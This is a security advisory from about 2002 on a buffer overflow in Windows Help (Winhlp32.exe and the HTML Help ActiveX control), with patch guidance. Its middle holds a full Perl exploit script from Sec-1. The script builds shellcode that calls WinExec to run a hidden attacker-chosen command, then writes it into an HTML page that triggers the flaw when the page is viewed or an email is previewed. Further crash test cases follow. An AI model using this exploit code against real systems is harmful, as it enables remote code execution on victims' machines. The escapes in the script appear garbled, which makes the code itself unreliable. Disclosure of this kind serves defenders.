|
COMMAND Winhlp32.exe, Windows Help System Buffer Overflow SYSTEMS AFFECTED Windows XP,2000,NT,ME and 98 PROBLEM Mark Litchfield [mark@ngssoftware.com] of NGSSoftware [http://www.ngssoftware.com] in advisory [#NISR01082002] : Many of the features available in HTML Help are implemented through the HTML Help ActiveX control (HHCtrl.ocx). The HTML Help ActiveX control is used to provide navigation features (such as a table of contents), to display secondary windows and pop-up definitions, and to provide other features. The HTML Help ActiveX control can be used from topics in a compiled Help system as well as from HTML pages displayed in a Web browser. The functionality provided by the HTML Help ActiveX control will run in the HTML Help Viewer or in any browser that supports ActiveX technology, such as Internet Explorer (version 3.01 or later). Some features, as with the WinHlp Command, provided by the HTML Help ActiveX control are meant to be available only when it is used from a compiled HTML Help file (.chm) that is displayed by using the HTML Help Viewer. Details ******* Winhlp32.exe is vulnerable to a bufferoverrun attack using the Item parameter within WinHlp Command, the item parameter is used to specify the file path of the WinHelp (.hlp) file in which the WinHelp topic is stored, and the window name of the target window. Using this overrun, an attacker can successfully exectute arbitary code on a remote system by either encouraging the victim to visit a particular web page, whereby code would execute automatically, or by including the exploit within the source of an email. In regards to email, execution would automatically occur when the mail appears in the preview pane and ActiveX objects are allowed (This is allowed by default, the Internet Security Settings would have to be set as HIGH to prevent execution of this vulnerability). Any exploit would execute in the context of the logged on user. Exploit (Update 20 August 2002) ======= # Winhlp32.exe Remote BufferOverrun exploit code. written by Gary O'leary-Steele Sec-1 Ltd. Garyo@sec-1.com # For use as proof of concept # Kernel32.dll version 5.0.2195.4272 ####### Kernell32 jmp ebx 77E87793 $sploit = "x55x8bxecx8bxc3". #xc5 is ebp change if error "xbexffxffxffxff". "x81xEEx85x85x85x85". "x83xc0x01". "x8bx10". "x3bxd6". "x75xf7". "x8bxd8". "x83xc3x01". "x80x6bx03x41". "x8bx7bx04". "x81xffx58x58x58x58". "x75xEE". "x81x6bx04x58x58x58x58". "x33xf6". "x56". "x83xc0x04". "x50". "xbbx94xeexe8x77". # mov ebx, 0x77e8ee94 winexec() address "xffxd3"; #call ebx $exitproc = "xBBx5dxa9xe8x77". "x83xebx01". "xffxd3"; $RET = "x24xF1x5dx01"; $EIP2 = "x93x77xe8x77"; # This works #$EIP2 = "xf6xbfx30x78"; # direct jump = 0006FBD4 ##$EIP2 = "xd4xfbx06x00"; print "Exploit code for Winhlp32.exe Remote BufferOverrun.nBy Gary Oleary-Steele Sec-1 LtdnCalls WinExec SW_HIDE and executes supplied commandnTested on windows 2000 professional SP2nn"; print "Enter Command to execute: "; $command =<STDIN>; print "Enter Output File: "; $outputfile =<STDIN>; chomp $command; chomp $outputfile; open(INFILE,">$outputfile"); $command = encode($command); $nn = 123 - length($command); $nops = "x90" x $nn; $exploit = $sploit . "zzzz". $command .'XXXX'. $nops .$exitproc. $RET .$EIP2; $f1= <<"file1"; <OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp type=application/x-oleobject width=0><PARAM NAME="Width" VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command" VALUE="WinHelp"><PARAM NAME="Item1" VALUE=' file1 chomp $f1; $f2= <<"file2"; '><PARAM NAME="Item2" VALUE="Sec-1 LTD"></OBJECT> <SCRIPT>winhelp.HHClick()</SCRIPT> file2 print INFILE $f1.$exploit.$f2; sub encode($command){ $lofcmd =length($command); $i = 0; for ($i ;$i < $lofcmd; $i++){ $chartoconvert = substr($command,$i,1); # pull out each character $chartoconvert = ord($chartoconvert); # convert to a dec for ($b=0; $b < 65; $b++){ $chartoconvert++ ; } $tmpchr = chr($chartoconvert); #convert back to chr $newchar = $newchar . $tmpchr; } print $newchar; return $newchar; } -Also- Jelmer adds : I just installed servicepack 3 and the following code still crashed my my IE6 with a memory could not be refferenced error. <OBJECT ID=hhctrl TYPE="application/x-oleobject" CLASSID="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"> <PARAM name="Command" value="Shortcut"> <PARAM name="Button" value="Bitmap:shortcut"> <PARAM name="Item1" value=",,"> <PARAM name="Item2" value="273,1,1"> <PARAM name="codebase" value=""> <PARAM name="Font" value=" A VERY VERY LONG STRING "> </OBJECT> I have been told this means it is most likely exploitable. I am not into buffer overflows myself though, maybe someone can confirm this. Anyways I notified microsoft of this several months ago. The day after I notified them someone pointed me to the ngssoftware advisory *sob*, and I notified microsoft that this was probably the same issue, last I heard from them they where looking in to if this was indeed the case. It's been several months and as far as I know they are still looking. Update (03 October 2002) ====== David Litchfield [david@ngssoftware.com] of NGS Insight Security Research in a new advisory [#NISR02102002], says : http://www.ngssoftware.com/advisories/ms-winhlp.txt --snapp-- The Windows Help system includes an ActiveX control known as the HTML Help Control, hhctrl.ocx. The "Alink" function of this control is vulnerable to a buffer overflow that can be exploited to gain control of the user's machine. --snapp-- Update (10 October 2002) ====== In Thor Larholm [thor@pivx.com] advisory [http://www.pivx.com] : --snipp-- we feel that it will benefit and empower endusers more if they are able to easily verify for themselves whether they are using a vulnerable version of Windows Help. Others have recently made the public aware of this vulnerability as well, though without disclosing any actual details. Exploit: <script>showHelp( A*796 );</script> Simple, oneclick testcase http://www.pivx.com/larholm/adv/TL004/simple.html Try your own numbers http://www.pivx.com/larholm/adv/TL004/number.html --snapp-- SOLUTION NGSSoftware highly recommend installing Microsoft Windows SP3, as the fix has been built into this service pack found at http://www.microsoft.com An alternative to these patches would be to ensure the security settings found in the Internet Options is set to high. Despite the Medium setting, stating that unsigned ActiveX controls will not be downloaded, Kylie will still execute Calc.exe. Another alternative would be to remove winhlp32.exe if it is not required within your environment. Update (03 October 2002) ====== Microsoft have produced a patch which is available from their web site. More details are available from : http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS02-055.asp